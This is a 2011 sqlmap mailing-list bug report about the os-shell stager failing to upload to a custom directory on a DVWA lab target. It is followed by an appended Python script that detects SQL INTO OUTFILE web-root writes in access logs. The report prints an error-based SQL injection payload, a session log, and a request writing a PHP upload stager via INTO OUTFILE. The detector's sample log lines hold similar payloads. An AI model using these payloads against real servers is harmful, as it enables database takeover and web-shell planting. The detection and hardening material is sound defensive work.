[sqlmap-users] os-shell bug
From: Robin W. <ro...@di...> - 2011-11-03 13:40:34
I think I've found a bug in the os-shell command when specifying extra directories to try to upload a shell file to. In this example I've told it the full document root is /opt/lampp/htdocs, but I've made a directory in there called uploads which has full write permissions. I specify the uploads directory when asked for additional web server paths, giving it the full server path of /opt/lampp/htdocs/uploads.

Watching the traffic in Burp, it first tries to upload to the root, which fails. It then tries the uploads directory, but when it checks to see if the file has been uploaded it checks for the temporary file in the vulnerabilities directory, not the uploads directory. It then tries an upload to the vulnerabilities directory (it has previously detected this, so I assume that is why it is trying it) and again fails, but does try to check the right directory this time. I've attached a screenshot from Burp showing the hits.

Manually checking the uploads directory, it hasn't managed to upload the file even though it should be able to, as the directory is fully writable and the db is mysql running as root. I think this could be down to the query being sent across. I know the decoding here isn't quite right, but it is adding the php to the wrong place in the query:

    GET /vulner«ilities/sqli/?id= % LIMIT% 1% INTO% OUTFILE% %'%/opt%/lampp%/htdocs%/uploads%/tmpuzmzk.php%'% LINES% TERMINATí% BY% 0x<?php if (isset($_REQUEST["upload"])) { $dir=$_REQUEST["uploadDir"];

I'm doing all of this against DVWA with a manually created uploads directory.

Robin

    sqlmap-dev $ ./sqlmap.py -c dvwa.conf --os-shell --proxy=http://localhost:8080

        sqlmap/1.0-dev (r4488) - automatic SQL injection and database takeover tool
        http://www.sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 12:42:06

    [12:42:07] [INFO] using '/Users/robin/src/sqlmap-dev/output/192.168.56.101/session' as session file
    [12:42:07] [INFO] resuming injection data from session file
    [12:42:07] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    [12:42:07] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=12 AND (SELECT 6722 FROM(SELECT COUNT(*),CONCAT(0x3a64657a3a,(SELECT (CASE WHEN (6722=6722) THEN 1 ELSE 0 END)),0x3a6a76633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
    ---
    [12:42:09] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.3.1, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [12:42:09] [INFO] going to use a web backdoor for command prompt
    [12:42:09] [INFO] fingerprinting the back-end DBMS operating system
    [12:42:09] [INFO] the back-end DBMS operating system is Linux
    [12:42:09] [INFO] trying to upload the file stager
    which web application language does the web server support?
    [1] ASP
    [2] ASPX
    [3] PHP (default)
    [4] JSP
    > 3
    [12:42:12] [WARNING] unable to retrieve the web server document root
    please provide the web server document root [/var/www/]: /opt/lampp/htdocs
    [12:42:19] [WARNING] unable to retrieve any web server path
    please provide any additional web server full path to try to upload the agent [Enter for None]: /opt/lampp/uploads/
    [12:42:30] [INFO] heuristics detected web page charset 'ascii'
    [12:42:33] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs'
    [12:42:36] [WARNING] unable to upload the file stager on '/opt/lampp/uploads'
    [12:42:38] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs/vulnerabilities'
    [12:42:38] [WARNING] HTTP error codes detected during testing: 404 (Not Found) - 3 times
    [12:42:38] [INFO] Fetched data logged to text files under '/Users/robin/src/sqlmap-dev/output/192.168.56.101'

    [*] shutting down at 12:42:38
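The stager upload described in the post works by injecting a MySQL `INTO OUTFILE` clause whose target path sits inside a served directory, so the same request is what a web server log shows when such an attempt is made. The following is an added detection example, not code from the post or from sqlmap: it parses combined-format access log lines, URL-decodes the request target (twice, to catch double-encoded payloads), extracts every `INTO OUTFILE` / `INTO DUMPFILE` target path, and reports whether the path falls under a known document root. The sample log lines are constructed for this example; the web roots assume the post's `/opt/lampp/htdocs` plus a hypothetical `/var/www/html`.

```python
import posixpath
import re
from urllib.parse import unquote_plus

# Served directories to check file-write targets against. /opt/lampp/htdocs comes
# from the post; /var/www/html is an assumed second root for illustration.
WEBROOTS = ["/opt/lampp/htdocs", "/var/www/html"]

# MySQL file-write clause: INTO OUTFILE 'path' or INTO DUMPFILE 'path'
OUTFILE_RE = re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\s*'([^']*)'", re.IGNORECASE)

# Combined log format; only client, timestamp, request target and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not from the post). 0x3c3f706870 is hex for "<?php".
SAMPLE_LOG = [
    '192.168.56.1 - - [03/Nov/2011:12:42:33 +0000] "GET /vulnerabilities/sqli/?id=1%20LIMIT%201'
    '%20INTO%20OUTFILE%20%27/opt/lampp/htdocs/tmpuzmzk.php%27%20LINES%20TERMINATED%20BY'
    '%200x3c3f706870&Submit=Submit HTTP/1.1" 200 4321',
    '192.168.56.1 - - [03/Nov/2011:12:42:36 +0000] "GET /vulnerabilities/sqli/?id=1%20LIMIT%201'
    '%20INTO%20OUTFILE%20%27/opt/lampp/uploads/tmpuzmzk.php%27%20LINES%20TERMINATED%20BY'
    '%200x3c3f706870&Submit=Submit HTTP/1.1" 200 4321',
    '192.168.56.1 - - [03/Nov/2011:12:42:37 +0000] "GET /vulnerabilities/sqli/?id=1%20AND%201=1'
    '&Submit=Submit HTTP/1.1" 200 4321',
    # double percent-encoded (%2527 -> %27 -> '), a common attempt to slip past single-decode filters
    '10.0.0.5 - - [03/Nov/2011:12:43:00 +0000] "GET /search?q=%2527%2520INTO%2520DUMPFILE'
    '%2520%2527/var/www/html/x.php%2527 HTTP/1.1" 500 120',
]


def decode_target(target: str) -> tuple:
    """Return (fully decoded target, was_double_encoded).

    A second decode pass is a no-op on already-plain text, so it is safe to
    always apply; a difference between passes flags deliberate double encoding.
    """
    once = unquote_plus(target)
    twice = unquote_plus(once)
    return twice, once != twice


def extract_outfile_targets(decoded_target: str) -> list:
    """All (OUTFILE|DUMPFILE, path) pairs found in a decoded request target."""
    return [(m.group(1).upper(), m.group(2)) for m in OUTFILE_RE.finditer(decoded_target)]


def is_under_webroot(path: str, webroots: list) -> bool:
    """True if the normalised path lies inside any served directory.

    normpath collapses '..' segments so '/opt/lampp/htdocs/../uploads/x.php' is
    judged by where it really lands, not by its prefix.
    """
    norm = posixpath.normpath(path)
    return any(norm == r.rstrip("/") or norm.startswith(r.rstrip("/") + "/") for r in webroots)


def scan_access_log(lines: list, webroots: list) -> list:
    """Return one finding per file-write clause seen in the request targets."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        decoded, double_encoded = decode_target(m.group("target"))
        for kind, path in extract_outfile_targets(decoded):
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "kind": kind,
                "path": path,
                "in_webroot": is_under_webroot(path, webroots),
                "double_encoded": double_encoded,
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG, WEBROOTS):
        flag = "WEBROOT-WRITE" if f["in_webroot"] else "file-write"
        print(f"{f['ts']} {f['ip']} {flag} {f['kind']} -> {f['path']}"
              f"{' (double-encoded)' if f['double_encoded'] else ''} status={f['status']}")
```

A write attempt whose path resolves under a served directory is the case worth paging on, since a successful `INTO OUTFILE` there is an arbitrary file drop reachable over HTTP; a write elsewhere (the second sample line, which mirrors the mistyped `/opt/lampp/uploads/` path in the post's session) still signals injection but cannot produce a web-reachable file. Pair this with `secure_file_priv` set to a non-web directory and a MySQL account without the FILE privilege, which removes the write capability regardless of what the application passes through.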